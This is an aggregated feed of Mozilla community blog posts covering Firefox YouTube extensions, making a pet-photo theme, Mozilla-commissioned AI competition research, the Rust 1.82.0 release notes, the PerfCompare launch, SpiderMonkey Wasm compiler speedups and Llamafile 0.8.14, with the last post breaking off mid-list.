YouTube wants you to experience YouTube in very prescribed ways. But with the right browser extension, you’re free to alter YouTube to taste. Change the way the site looks, behaves, and delivers your favorite videos. 

Enhancer for YouTube

With dozens of customization features, Enhancer for YouTube has the power to dramatically reorient the way you watch videos. 

While a bunch of customization options may seem overwhelming, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

<figcaption class="wp-element-caption">Enhancer for YouTube offers easy access controls just beneath the video player.</figcaption>

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration

Return YouTube Dislike

Do you like the Dislike? YouTube removed the display that revealed the number of thumbs-down Dislikes a video has, but with Return YouTube Dislike you can bring back the brutal truth. 

“Does exactly what the name suggests. Can’t see myself without this extension. Seriously, bad move on YouTube for removing such a vital tool.”

Firefox user OFG

“i have never smashed 5 stars faster.”

Firefox user 12918016

YouTube High Definition

Though its primary function is to automatically play all YouTube videos in their highest possible resolution, YouTube High Definition has a few other fine features to offer. 

In addition to automatic HD, YouTube High Definition can…

  • Customize video player size
  • HD support for clips embedded on external sites
  • Specify your ideal resolution (4k – 144p)
  • Set a preferred volume level 
  • Also automatically plays the highest quality audio

YouTube NonStop

So simple. So awesome. YouTube NonStop remedies the headache of interrupting your music with that awful “Video paused. Continue watching?” message. 

Works on YouTube and YouTube Music. You’re now free to navigate away from your YouTube tab for as long as you like and not fret that the rock will stop rolling. 

Unhook: Remove YouTube Recommended Videos & Comments

Instant serenity for YouTube! Unhook lets you strip away unwanted distractions like the promotional sidebar, endscreen suggestions, trending tab, and much more. 

More than two dozen customization options make this an essential extension for anyone seeking escape from YouTube rabbit holes. You can even hide notifications and live chat boxes. 

“This is the best extension to control YouTube usage, and not let YouTube control you.”

Firefox user Shubham Mandiya

PocketTube

If you subscribe to a lot of YouTube channels PocketTube is a fantastic way to organize all your subscriptions by themed collections. 

Group your channel collections by subject, like “Sports,” “Cooking,” “Cat videos” or whatever. Other key features include…

  • Add custom icons to easily identify your channel collections
  • Customize your feed so you just see videos you haven’t watched yet, prioritize videos from certain channels, plus other content settings
  • Integrates seamlessly with YouTube homepage 
  • Sync collections across Firefox/Android/iOS using Google Drive and Chrome Profiler
<figcaption class="wp-element-caption">PocketTube keeps your channel collections neatly tucked away to the side. </figcaption>

AdBlocker for YouTube

It’s not just you who’s noticed a lot more ads lately. Regain control with AdBlocker for YouTube

The extension very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster, more focused YouTube. 

SponsorBlock

It’s a terrible experience when you’re enjoying a video or music on YouTube and you’re suddenly interrupted by a blaring ad. SponsorBlock solves this problem in a highly effective and original way. 

Leveraging the power of crowd sourced information to locate where—precisely— interruptive sponsored segments appear in videos, SponsorBlock learns where to automatically skip sponsored segments with its ever growing database of videos. You can also participate in the project by reporting sponsored segments whenever you encounter them (it’s easy to report right there on the video page with the extension). 

SponsorBlock can also learn to skip non-music portions of music videos and intros/outros, as well. If you’d like a deeper dive of SponsorBlock we profiled its developer and open source project on Mozilla Distilled

We hope one of these extensions enhances the way you enjoy YouTube. Feel free to explore more great media extensions on addons.mozilla.org

 

Firefox Add-on ReviewsHow to turn your household pet into a Firefox theme

Themes are a fun way to change the visual appearance of Firefox and give the browser a look that’s all your own. You’re free to explore more than a half-million community created themes on addons.mozilla.org (AMO), or better yet, create your own custom theme. Best of all — create a theme featuring a beloved pet! Then you can take your little buddy with you wherever you go on the web. 

(You’ll need a Mozilla account to create and publish Firefox themes on AMO.)

Prepare your pet pic for upload

I find it helpful to first size my image properly. For Firefox themes, we recommend images with a height between 100 – 200 pixels. So I might first prepare an image with a couple of sizing options, perhaps one at 100 pixel height and another at 200, and see what works best. (Note: as you resize an image, be sure its height and width parameters change in sync so your image maintains proper dimensions.)

Tootsie strikes a pose to become a Firefox theme.<figcaption class="wp-element-caption">Tootsie strikes a pose to become a Firefox theme. </figcaption>

Depending on what type of image editing software you have on your computer (PC users can resize pics with the standard Photo or Paint apps, while Mac users may be familiar with Preview), find the controls to resize and save your images in the recommended range. Supported file formats include PNG, JPG, APNG, SVG, or GIF (not animated) and can be up to 6.9MB. 

Upload your pet pic & select custom colors

Go to AMO’s Theme Generator page and…

  • Name your theme
  • Upload your image
  • Select colors for the header background, text and icons
<figcaption class="wp-element-caption">Point-and-click color palettes make it easy to create complementary color combinations. </figcaption>

Once you like the way your new theme looks in the preview display, click Finish Theme and you’re done! All new theme submissions must first pass a review process, but that usually only takes a day or two, after which you’ll receive an email notifying you that your personalized pet theme is ready to install on Firefox. Now Tootsie accompanies me everywhere online, although sometimes she just stares at me. 

For more tips on creating Firefox themes, please see this Theme Generator guide or visit the Extension Workshop

The Mozilla BlogMozilla’s research: Unlocking AI for everyone, not just Big Tech

Artificial intelligence (AI) is shaping how we live, work and connect with the world. From chatbots to image generators, AI is transforming our online experiences. But this change raises serious questions: Who controls the technology behind these AI systems? And how can we ensure that everyone — not just traditional big tech — has a fair shot at accessing and contributing to this powerful tool?

To explore these crucial issues, Mozilla commissioned two pieces of research that dive deep into the challenges around AI access and competition: “External Researcher Access to Closed Foundation Models” (commissioned from data rights agency AWO) and “Stopping Big Tech From Becoming Big AI” (commissioned from the Open Markets Institute). These reports show how AI is being built, who’s in control and what changes need to happen to ensure a fair and open AI ecosystem.

Why researcher access matters

“External Researcher Access to Closed Foundation Models” (authored by Esme Harrington and Dr. Mathias Vermeulen from AWO) addresses a pressing issue: independent researchers need better conditions for accessing and studying the AI models that big companies have developed. Foundation models — the core technology behind many AI applications — are controlled mainly by a few major players who decide who can study or use them.

What’s the problem with access?

  • Limited access: Companies like OpenAI, Google and others are the gatekeepers. They often restrict access to researchers whose work aligns with their priorities, which means independent, public-interest research can be left out in the cold.
  • High-end costs: Even when access is granted, it often comes with a hefty price tag that smaller or less-funded teams can’t afford.
  • Lack of transparency: These companies don’t always share how their models are updated or moderated, making it nearly impossible for researchers to replicate studies or fully understand the technology.
  • Legal risks: When researchers try to scrutinize these models, they sometimes face legal threats if their work uncovers flaws or vulnerabilities in the AI systems.

The research suggests that companies need to offer more affordable and transparent access to improve AI research. Additionally, governments should provide legal protections for researchers, especially when they are acting in the public interest by investigating potential risks.

A glowing network pyramid with nodes connected by lines, emerging from an illuminated web beneath the surface, symbolizing interconnected communication and data flow.

External researcher access to closed foundation models

Read the paper

AI competition: Is big tech stifling innovation?

The second piece of research (authored by Max von Thun and Daniel Hanley from the Open Markets Institute) takes a closer look at the competitive landscape of AI. Right now, a few tech giants like Microsoft, Google, Amazon, Meta and Apple are building expansive ecosystems which set them up to dominate various parts of the AI value chain. And a handful of companies control most of the key resources needed to develop advanced AI, including computing power, data and cloud infrastructure. The result? Smaller companies and independent innovators are being squeezed out of the race from the start.

What’s happening in the AI market?

  • Market concentration: A small number of companies have a stranglehold on key inputs and distribution in  AI. They control the data, computing power and infrastructure everyone else needs to develop AI.
  • Anticompetitive tie-ups: These big players buy up or do deals with smaller AI startups which often evade traditional competition controls. This can stop these smaller companies challenging big tech and prevents others from competing on an even playing field.
  • Gatekeeper power: Big Tech’s control over essential infrastructure — like cloud services and app stores — allows them to set unfair terms for smaller competitors. They can charge higher fees or prioritize their products over others.

The research calls for strong action from governments and regulators to avoid recreating the same market concentration we have seen in digital markets over the past 20 years . It’s about creating a level playing field where smaller companies can compete, innovate and offer consumers more choices. This means enforcing rules to prevent tech giants from using their platforms to give their AI products an unfair advantage. It also ensures that critical resources like computing power and data are more accessible to everyone, not just big tech.

A futuristic chessboard with blue and purple tones, featuring connected glowing lines between pieces, including a queen, pawns, a knight, and a rook, suggesting a network or strategy concept.

Stopping Big Tech From Becoming Big AI

Read the paper

Why this matters

AI has the potential to bring significant benefits to society, but only if it’s developed in a way that’s open, fair and accountable. Mozilla believes that a few powerful corporations shouldn’t determine the future of AI. Instead, we need a diverse and vibrant ecosystem where public-interest research thrives and competition drives innovation and choice – including from open source, public, non-profit and private actors.

The findings emphasize the need for change. Improving access to foundation models for researchers and addressing the growing concentration of power in AI can help ensure that AI develops in ways that benefit all of us — not just the tech giants.

Mozilla is committed to advocating for a more transparent and competitive AI landscape; this research is an essential step toward making that vision a reality. 

The post Mozilla’s research: Unlocking AI for everyone, not just Big Tech appeared first on The Mozilla Blog.

The Rust Programming Language BlogAnnouncing Rust 1.82.0

The Rust team is happy to announce a new version of Rust, 1.82.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.82.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.82.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.82.0 stable

cargo info

Cargo now has an info subcommand to display information about a package in the registry, fulfilling a long standing request just shy of its tenth anniversary! Several third-party extensions like this have been written over the years, and this implementation was developed as cargo-information before merging into Cargo itself.

For example, here's what you could see for cargo info cc:

cc #build-dependencies
A build-time dependency for Cargo build scripts to assist in invoking the native
C compiler to compile native C code into a static archive to be linked into Rust
code.
version: 1.1.23 (latest 1.1.30)
license: MIT OR Apache-2.0
rust-version: 1.63
documentation: https://docs.rs/cc
homepage: https://github.com/rust-lang/cc-rs
repository: https://github.com/rust-lang/cc-rs
crates.io: https://crates.io/crates/cc/1.1.23
features:
  jobserver = []
  parallel  = [dep:libc, dep:jobserver]
note: to see how you depend on cc, run `cargo tree --invert --package cc@1.1.23`

By default, cargo info describes the package version in the local Cargo.lock, if any. As you can see, it will indicate when there's a newer version too, and cargo info cc@1.1.30 would report on that.

Apple target promotions

macOS on 64-bit ARM is now Tier 1

The Rust target aarch64-apple-darwin for macOS on 64-bit ARM (M1-family or later Apple Silicon CPUs) is now a tier 1 target, indicating our highest guarantee of working properly. As the platform support page describes, every change in the Rust repository must pass full tests on every tier 1 target before it can be merged. This target was introduced as tier 2 back in Rust 1.49, making it available in rustup. This new milestone puts the aarch64-apple-darwin target on par with the 64-bit ARM Linux and the X86 macOS, Linux, and Windows targets.

Mac Catalyst targets are now Tier 2

Mac Catalyst is a technology by Apple that allows running iOS applications natively on the Mac. This is especially useful when testing iOS-specific code, as cargo test --target=aarch64-apple-ios-macabi --target=x86_64-apple-ios-macabi mostly just works (in contrast to the usual iOS targets, which need to be bundled using external tooling before they can be run on a native device or in the simulator).

The targets are now tier 2, and can be downloaded with rustup target add aarch64-apple-ios-macabi x86_64-apple-ios-macabi, so now is an excellent time to update your CI pipeline to test that your code also runs in iOS-like environments.

Precise capturing use<..> syntax

Rust now supports use<..> syntax within certain impl Trait bounds to control which generic lifetime parameters are captured.

Return-position impl Trait (RPIT) types in Rust capture certain generic parameters. Capturing a generic parameter allows that parameter to be used in the hidden type. That in turn affects borrow checking.

In Rust 2021 and earlier editions, lifetime parameters are not captured in opaque types on bare functions and on functions and methods of inherent impls unless those lifetime parameters are mentioned syntactically in the opaque type. E.g., this is an error:

//@ edition: 2021
fn f(x: &()) -> impl Sized { x }
error[E0700]: hidden type for `impl Sized` captures lifetime that does not appear in bounds
 --> src/main.rs:1:30
  |
1 | fn f(x: &()) -> impl Sized { x }
  |         ---     ----------   ^
  |         |       |
  |         |       opaque type defined here
  |         hidden type `&()` captures the anonymous lifetime defined here
  |
help: add a `use<...>` bound to explicitly capture `'_`
  |
1 | fn f(x: &()) -> impl Sized + use<'_> { x }
  |                            +++++++++

With the new use<..> syntax, we can fix this, as suggested in the error, by writing:

fn f(x: &()) -> impl Sized + use<'_> { x }

Previously, correctly fixing this class of error required defining a dummy trait, conventionally called Captures, and using it as follows:

trait Captures<T: ?Sized> {}
impl<T: ?Sized, U: ?Sized> Captures<T> for U {}

fn f(x: &()) -> impl Sized + Captures<&'_ ()> { x }

That was called "the Captures trick", and it was a bit baroque and subtle. It's no longer needed.

There was a less correct but more convenient way to fix this that was often used called "the outlives trick". The compiler even previously suggested doing this. That trick looked like this:

fn f(x: &()) -> impl Sized + '_ { x }

In this simple case, the trick is exactly equivalent to + use<'_> for subtle reasons explained in RFC 3498. However, in real life cases, this overconstrains the bounds on the returned opaque type, leading to problems. For example, consider this code, which is inspired by a real case in the Rust compiler:

struct Ctx<'cx>(&'cx u8);

fn f<'cx, 'a>(
    cx: Ctx<'cx>,
    x: &'a u8,
) -> impl Iterator<Item = &'a u8> + 'cx {
    core::iter::once_with(move || {
        eprintln!("LOG: {}", cx.0);
        x
    })
//~^ ERROR lifetime may not live long enough
}

We can't remove the + 'cx, since the lifetime is used in the hidden type and so must be captured. Neither can we add a bound of 'a: 'cx, since these lifetimes are not actually related and it won't in general be true that 'a outlives 'cx. If we write + use<'cx, 'a> instead, however, this will work and have the correct bounds.

There are some limitations to what we're stabilizing today. The use<..> syntax cannot currently appear within traits or within trait impls (but note that there, in-scope lifetime parameters are already captured by default), and it must list all in-scope generic type and const parameters. We hope to lift these restrictions over time.

Note that in Rust 2024, the examples above will "just work" without needing use<..> syntax (or any tricks). This is because in the new edition, opaque types will automatically capture all lifetime parameters in scope. This is a better default, and we've seen a lot of evidence about how this cleans up code. In Rust 2024, use<..> syntax will serve as an important way of opting-out of that default.

For more details about use<..> syntax, capturing, and how this applies to Rust 2024, see the "RPIT lifetime capture rules" chapter of the edition guide. For details about the overall direction, see our recent blog post, "Changes to impl Trait in Rust 2024".

Native syntax for creating a raw pointer

Unsafe code sometimes has to deal with pointers that may dangle, may be misaligned, or may not point to valid data. A common case where this comes up are repr(packed) structs. In such a case, it is important to avoid creating a reference, as that would cause undefined behavior. This means the usual & and &mut operators cannot be used, as those create a reference -- even if the reference is immediately cast to a raw pointer, it's too late to avoid the undefined behavior.

For several years, the macros std::ptr::addr_of! and std::ptr::addr_of_mut! have served this purpose. Now the time has come to provide a proper native syntax for this operation: addr_of!(expr) becomes &raw const expr, and addr_of_mut!(expr) becomes &raw mut expr. For example:

#[repr(packed)]
struct Packed {
    not_aligned_field: i32,
}

fn main() {
    let p = Packed { not_aligned_field: 1_82 };

    // This would be undefined behavior!
    // It is rejected by the compiler.
    //let ptr = &p.not_aligned_field as *const i32;

    // This is the old way of creating a pointer.
    let ptr = std::ptr::addr_of!(p.not_aligned_field);

    // This is the new way.
    let ptr = &raw const p.not_aligned_field;

    // Accessing the pointer has not changed.
    // Note that `val = *ptr` would be undefined behavior because
    // the pointer is not aligned!
    let val = unsafe { ptr.read_unaligned() };
}

The native syntax makes it more clear that the operand expression of these operators is interpreted as a place expression. It also avoids the term "address-of" when referring to the action of creating a pointer. A pointer is more than just an address, so Rust is moving away from terms like "address-of" that reaffirm a false equivalence of pointers and addresses.

Safe items with unsafe extern

Rust code can use functions and statics from foreign code. The type signatures of these foreign items are provided in extern blocks. Historically, all items within extern blocks have been unsafe to use, but we didn't have to write unsafe anywhere on the extern block itself.

However, if a signature within the extern block is incorrect, then using that item will result in undefined behavior. Would that be the fault of the person who wrote the extern block, or the person who used that item?

We've decided that it's the responsibility of the person writing the extern block to ensure that all signatures contained within it are correct, and so we now allow writing unsafe extern:

unsafe extern {
    pub safe static TAU: f64;
    pub safe fn sqrt(x: f64) -> f64;
    pub unsafe fn strlen(p: *const u8) -> usize;
}

One benefit of this is that items within an unsafe extern block can be marked as safe to use. In the above example, we can call sqrt or read TAU without using unsafe. Items that aren't marked with either safe or unsafe are conservatively assumed to be unsafe.

In future releases, we'll be encouraging the use of unsafe extern with lints. Starting in Rust 2024, using unsafe extern will be required.

For further details, see RFC 3484 and the "Unsafe extern blocks" chapter of the edition guide.

Unsafe attributes

Some Rust attributes, such as no_mangle, can be used to cause undefined behavior without any unsafe block. If this were regular code we would require them to be placed in an unsafe {} block, but so far attributes have not had comparable syntax. To reflect the fact that these attributes can undermine Rust's safety guarantees, they are now considered "unsafe" and should be written as follows:

#[unsafe(no_mangle)]
pub fn my_global_function() { }

The old form of the attribute (without unsafe) is currently still accepted, but might be linted against at some point in the future, and will be a hard error in Rust 2024.

This affects the following attributes:

  • no_mangle
  • link_section
  • export_name

For further details, see the "Unsafe attributes" chapter of the edition guide.

Omitting empty types in pattern matching

Patterns which match empty (a.k.a. uninhabited) types by value can now be omitted:

use std::convert::Infallible;
pub fn unwrap_without_panic<T>(x: Result<T, Infallible>) -> T {
    let Ok(x) = x; // the `Err` case does not need to appear
    x
}

This works with empty types such as a variant-less enum Void {}, or structs and enums with a visible empty field and no #[non_exhaustive] attribute. It will also be particularly useful in combination with the never type !, although that type is still unstable at this time.

There are some cases where empty patterns must still be written. For reasons related to uninitialized values and unsafe code, omitting patterns is not allowed if the empty type is accessed through a reference, pointer, or union field:

pub fn unwrap_ref_without_panic<T>(x: &Result<T, Infallible>) -> &T {
    match x {
        Ok(x) => x,
        // this arm cannot be omitted because of the reference
        Err(infallible) => match *infallible {},
    }
}

To avoid interfering with crates that wish to support several Rust versions, match arms with empty patterns are not yet reported as “unreachable code” warnings, despite the fact that they can be removed.

Floating-point NaN semantics and const

Operations on floating-point values (of type f32 and f64) are famously subtle. One of the reasons for this is the existence of NaN ("not a number") values which are used to represent e.g. the result of 0.0 / 0.0. What makes NaN values subtle is that more than one possible NaN value exists. A NaN value has a sign (that can be checked with f.is_sign_positive()) and a payload (that can be extracted with f.to_bits()). However, both the sign and payload of NaN values are entirely ignored by == (which always returns false). Despite very successful efforts to standardize the behavior of floating-point operations across hardware architectures, the details of when a NaN is positive or negative and what its exact payload is differ across architectures. To make matters even more complicated, Rust and its LLVM backend apply optimizations to floating-point operations when the exact numeric result is guaranteed not to change, but those optimizations can change which NaN value is produced. For instance, f * 1.0 may be optimized to just f. However, if f is a NaN, this can change the exact bit pattern of the result!

With this release, Rust standardizes on a set of rules for how NaN values behave. This set of rules is not fully deterministic, which means that the result of operations like (0.0 / 0.0).is_sign_positive() can differ depending on the hardware architecture, optimization levels, and the surrounding code. Code that aims to be fully portable should avoid using to_bits and should use f.signum() == 1.0 instead of f.is_sign_positive(). However, the rules are carefully chosen to still allow advanced data representation techniques such as NaN boxing to be implemented in Rust code. For more details on what the exact rules are, check out our documentation.

With the semantics for NaN values settled, this release also permits the use of floating-point operations in const fn. Due to the reasons described above, operations like (0.0 / 0.0).is_sign_positive() (which will be const-stable in Rust 1.83) can produce a different result when executed at compile-time vs at run-time. This is not a bug, and code must not rely on a const fn always producing the exact same result.

Constants as assembly immediates

The const assembly operand now provides a way to use integers as immediates without first storing them in a register. As an example, we implement a syscall to write by hand:

const WRITE_SYSCALL: c_int = 0x01; // syscall 1 is `write`
const STDOUT_HANDLE: c_int = 0x01; // `stdout` has file handle 1
const MSG: &str = "Hello, world!\n";

let written: usize;

// Signature: `ssize_t write(int fd, const void buf[], size_t count)`
unsafe {
    core::arch::asm!(
        "mov rax, {SYSCALL} // rax holds the syscall number",
        "mov rdi, {OUTPUT}  // rdi is `fd` (first argument)",
        "mov rdx, {LEN}     // rdx is `count` (third argument)",
        "syscall            // invoke the syscall",
        "mov {written}, rax // save the return value",
        SYSCALL = const WRITE_SYSCALL,
        OUTPUT = const STDOUT_HANDLE,
        LEN = const MSG.len(),
        in("rsi") MSG.as_ptr(), // rsi is `buf *` (second argument)
        written = out(reg) written,
    );
}

assert_eq!(written, MSG.len());

Output:

Hello, world!

Playground link.

In the above, a statement such as LEN = const MSG.len() populates the format specifier LEN with an immediate that takes the value of MSG.len(). This can be seen in the generated assembly (the value is 14):

lea     rsi, [rip + .L__unnamed_3]
mov     rax, 1    # rax holds the syscall number
mov     rdi, 1    # rdi is `fd` (first argument)
mov     rdx, 14   # rdx is `count` (third argument)
syscall # invoke the syscall
mov     rax, rax  # save the return value

See the reference for more details.

Safely addressing unsafe statics

This code is now allowed:

static mut STATIC_MUT: Type = Type::new();
extern "C" {
    static EXTERN_STATIC: Type;
}
fn main() {
     let static_mut_ptr = &raw mut STATIC_MUT;
     let extern_static_ptr = &raw const EXTERN_STATIC;
}

In an expression context, STATIC_MUT and EXTERN_STATIC are place expressions. Previously, the compiler's safety checks were not aware that the raw ref operator did not actually affect the operand's place, treating it as a possible read or write to a pointer. No unsafety is actually present, however, as it just creates a pointer.

Relaxing this may cause problems where some unsafe blocks are now reported as unused if you deny the unused_unsafe lint, but they are now only useful on older versions. Annotate these unsafe blocks with #[allow(unused_unsafe)] if you wish to support multiple versions of Rust, as in this example diff:

 static mut STATIC_MUT: Type = Type::new();
 fn main() {
+    #[allow(unused_unsafe)]
     let static_mut_ptr = unsafe { std::ptr::addr_of_mut!(STATIC_MUT) };
 }

A future version of Rust is expected to generalize this to other expressions which would be safe in this position, not just statics.

Stabilized APIs

These APIs are now stable in const contexts:

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.82.0

Many people came together to create Rust 1.82.0. We couldn't have done it without all of you. Thanks!

Mozilla Performance BlogAnnouncing PerfCompare: the new comparison tool !

About two years ago, I joined the performance test team to help build PerfCompare, an improved performance tool designed to replace Perfherder’s Compare View. Around that time, we introduced PerfCompare to garner enthusiasm and feedback in creating a new workflow that would reduce the cognitive load and confusion of its predecessor. And, if we’re being honest, a tool that would also be more enjoyable from a design perspective for comparing the results of performance tests. But most importantly, we wanted to add new, relevant features while keeping Firefox engineers foremost in mind.

PerfCompare's first home page

Started from the bottom… PerfCompare’s first home page

Now, after working with Senior Product Designer Dasha Andriyenko to create a sleek, intuitive UI/UX, integrating feedback from engineers and leaders across different teams, and achieving key milestones, we’re excited to announce that PerfCompare is live and ready to use at perf.compare.

PerfCompare's current home page

Now we’re on top! PerfCompare today!

Time to celebrate! 🎉

PerfCompare’s ultimate purpose is to become a tool that empowers developers to make performance testing a core part of their development process.

We are targeting the end of this year to deprecate Compare View and make PerfCompare the primary tool to help Firefox developers analyze the performance impact of their patches.

We are in the process of updating the Firefox source docs, but documentation for PerfCompare can be found at PerfCompare Documentation. It provides details on all the new features currently available on PerfCompare and instructions on how to use the tool.

Some key highlights regarding features include:

  • Allowing comparisons of up to three new revisions/patches versus the base revision of a repository (mozilla-central, autoland, etc.)

Search results with selected base and new revisions selected

  • Searching revisions by short hash, long hash, or author email
  • A more visible and separate workflow for comparing revisions over time

Compare over time with one revision selected

  • Editing the compared revisions on the results page to compute new comparisons for an updated results table without having to return to the home page
  • Expanded rows in the results table with graphs for the base and new revisions

Expanded row in results table with graph


And there’s much more in the works!

I’d like to extend a huge congratulations to the performance test team, Dasha, and everyone who has contributed feedback and suggestions to our user research, team meetings, and presentations. We owe PerfCompare’s launch and continued improvement to you!

If you have any questions or comments about PerfCompare, you can find us in the #PerfCompare matrix channel or join our #PerfCompareUserResearch channel. If you experience any issues, please report them on Bugzilla.

Spidermonkey Development Blog75x faster: optimizing the Ion compiler backend

In September, machine learning engineers at Mozilla filed a bug report indicating that Firefox was consuming excessive memory and CPU resources while running Microsoft’s ONNX Runtime (a machine learning library) compiled to WebAssembly.

This post describes how we addressed this and some of our longer-term plans for improving WebAssembly performance in the future.

The problem

SpiderMonkey has two compilers for WebAssembly code. First, a Wasm module is compiled with the Wasm Baseline compiler, a compiler that generates decent machine code very quickly. This is good for startup time because we can start executing Wasm code almost immediately after downloading it. Andy Wingo wrote a nice blog post about this Baseline compiler.

When Baseline compilation is finished, we compile the Wasm module with our more advanced Ion compiler. This backend produces faster machine code, but compilation time is a lot higher.

The issue with the ONNX module was that the Ion compiler backend took a long time and used a lot of memory to compile it. On my Linux x64 machine, Ion-compiling this module took about 5 minutes and used more than 4 GB of memory. Even though this work happens on background threads, this was still too much overhead.

Optimizing the Ion backend

When we investigated this, we noticed that this Wasm module had some extremely large functions. For the largest one, Ion’s MIR control flow graph contained 132856 basic blocks. This uncovered some performance cliffs in our compiler backend.

VirtualRegister live ranges

In Ion’s register allocator, each VirtualRegister has a list of LiveRange objects. We were using a linked list for this, sorted by start position. This caused quadratic behavior when allocating registers: the allocator often splits live ranges into smaller ranges and we’d have to iterate over the list for each new range to insert it at the correct position to keep the list sorted. This was very slow for virtual registers with thousands of live ranges.

To address this, I tried a few different data structures. The first attempt was to use an AVL tree instead of a linked list and that was a big improvement, but the performance was still not ideal and we were also worried about memory usage increasing even more.

After this we realized we could store live ranges in a vector (instead of linked list) that’s optionally sorted by decreasing start position. We also made some changes to ensure the initial live ranges are sorted when we create them, so that we could just append ranges to the end of the vector.

The observation here was that the core of the register allocator, where it assigns registers or stack slots to live ranges, doesn’t actually require the live ranges to be sorted. We therefore now just append new ranges to the end of the vector and mark the vector unsorted. Right before the final phase of the allocator, where we again rely on the live ranges being sorted, we do a single std::sort operation on the vector for each virtual register with unsorted live ranges. Debug assertions are used to ensure that functions that require the vector to be sorted are not called when it’s marked unsorted.

Vectors are also better for cache locality and they let us use binary search in a few places. When I was discussing this with Julian Seward, he pointed out that Chris Fallin also moved away from linked lists to vectors in Cranelift’s port of Ion’s register allocator. It’s always good to see convergent evolution :)

This change from sorted linked lists to optionally-sorted vectors made Ion compilation of this Wasm module about 20 times faster, down to 14 seconds.

Semi-NCA

The next problem that stood out in performance profiles was the Dominator Tree Building compiler pass, in particular a function called ComputeImmediateDominators. This function determines the immediate dominator block for each basic block in the MIR graph.

The algorithm we used for this (based on A Simple, Fast Dominance Algorithm by Cooper et al) is relatively simple but didn’t scale well to very large graphs.

Semi-NCA (from Linear-Time Algorithms for Dominators and Related Problems by Loukas Georgiadis) is a different algorithm that’s also used by LLVM and the Julia compiler. I prototyped this and was surprised to see how much faster it was: it got our total compilation time down from 14 seconds to less than 8 seconds. For a single-threaded compilation, it reduced the time under ComputeImmediateDominators from 7.1 seconds to 0.15 seconds.

Fortunately it was easy to run both algorithms in debug builds and assert they computed the same immediate dominator for each basic block. After a week of fuzz-testing, no problems were found and we landed a patch that removed the old implementation and enabled the Semi-NCA code.

Sparse BitSets

For each basic block, the register allocator allocated a (dense) bit set with a bit for each virtual register. These bit sets are used to check which virtual registers are live at the start of a block.

For the largest function in the ONNX Wasm module, this used a lot of memory: 199477 virtual registers x 132856 basic blocks is at least 3.1 GB just for these bit sets! Because most virtual registers have short live ranges, these bit sets had relatively few bits set to 1.

We replaced these dense bit sets with a new SparseBitSet data structure that uses a hashmap to store 32 bits per entry. Because most of these hashmaps contain a small number of entries, it uses an InlineMap to optimize for this: it’s a data structure that stores entries either in a small inline array or (when the array is full) in a hashmap. We also optimized InlineMap to use a variant (a union type) for these two representations to save memory.

This saved at least 3 GB of memory but also improved the compilation time for the Wasm module to 5.4 seconds.

Faster move resolution

The last issue that showed up in profiles was a function in the register allocator called createMoveGroupsFromLiveRangeTransitions. After the register allocator assigns a register or stack slot to each live range, this function is responsible for connecting pairs of live ranges by inserting moves.

For example, if a value is stored in a register but is later spilled to memory, there will be two live ranges for its virtual register. This function then inserts a move instruction to copy the value from the register to the stack slot at the start of the second live range.

This function was slow because it had a number of loops with quadratic behavior: for a move’s destination range, it would do a linear lookup to find the best source range. We optimized the main two loops to run in linear time instead of being quadratic, by taking more advantage of the fact that live ranges are sorted.

With these changes, Ion can compile the ONNX Wasm module in less than 3.9 seconds on my machine, more than 75x faster than before these changes.

Adobe Photoshop

These changes not only improved performance for the ONNX Runtime module, but also for a number of other WebAssembly modules. A large Wasm module downloaded from the free online Adobe Photoshop demo can now be Ion-compiled in 14 seconds instead of 4 minutes.

The JetStream 2 benchmark has a HashSet module that was affected by the quadratic move resolution code. Ion compilation time for it improved from 2.8 seconds to 0.2 seconds.

New Wasm compilation pipeline

Even though these are great improvements, spending at least 14 seconds (on a fast machine!) to fully compile Adobe Photoshop on background threads still isn’t an amazing user experience. We expect this to only get worse as more large applications are compiled to WebAssembly.

To address this, our WebAssembly team is making great progress rearchitecting the Wasm compiler pipeline. This work will make it possible to Ion-compile individual Wasm functions as they warm up instead of compiling everything immediately. It will also unlock exciting new capabilities such as (speculative) inlining.

Stay tuned for updates on this as we start rolling out these changes in Firefox.

- Jan de Mooij, engineer on the SpiderMonkey team

Hacks.Mozilla.OrgLlamafile v0.8.14: a new UI, performance gains, and more

We’ve just released Llamafile 0.8.14, the latest version of our popular open source AI tool. A Mozilla Builders project, Llamafile turns model weights into fast, convenient executables that run on most computers, making it easy for anyone to get the most out of open LLMs using the hardware they already have.

New chat interface

The key feature of this new release is our colorful new command line chat interface. When you launch a Llamafile we now automatically open this new chat UI for you, right there in the terminal. This new interface is fast, easy to use, and an all around simpler experience than the Web-based interface we previously launched by default. (That interface, which our project inherits from the upstream llama.cpp project, is still available and supports a range of features, including image uploads. Simply point your browser at port 8080 on localhost).

llamafile

Other recent improvements

This new chat UI is just the tip of the iceberg. In the months since our last blog post here, lead developer Justine Tunney has been busy shipping a slew of new releases, each of which have moved the project forward in important ways. Here are just a few of the highlights:

Llamafiler: We’re building our own clean sheet OpenAI-compatible API server, called Llamafiler. This new server will be more reliable, stable, and most of all faster than the one it replaces. We’ve already shipped the embeddings endpoint, which runs three times as fast as the one in llama.cpp. Justine is currently working on the completions endpoint, at which point Llamafiler will become the default API server for Llamafile.

Performance improvements: With the help of open source contributors like k-quant inventor @Kawrakow Llamafile has enjoyed a series of dramatic speed boosts over the last few months. In particular, pre-fill (prompt evaluation) speed has improved dramatically on a variety of architectures:

  • Intel Core i9 went from 100 tokens/second to 400 (4x).
  • AMD Threadripper went from 300 tokens/second to 2,400 (8x).
  • Even the modest Raspberry Pi 5 jumped from 8 tokens/second to 80 (10x!).

When combined with the new high-speed embedding server described above, Llamafile has become one of the fastest ways to run complex local AI applications that use methods like retrieval augmented generation (RAG).

Support for powerful new models: Llamafile continues to keep pace with progress in open LLMs, adding support for dozens of new models and architectures, ranging in size from 405 billion parameters all the way down to 1 billion. Here are just a few of the new Llamafiles available for download on Hugging Face:

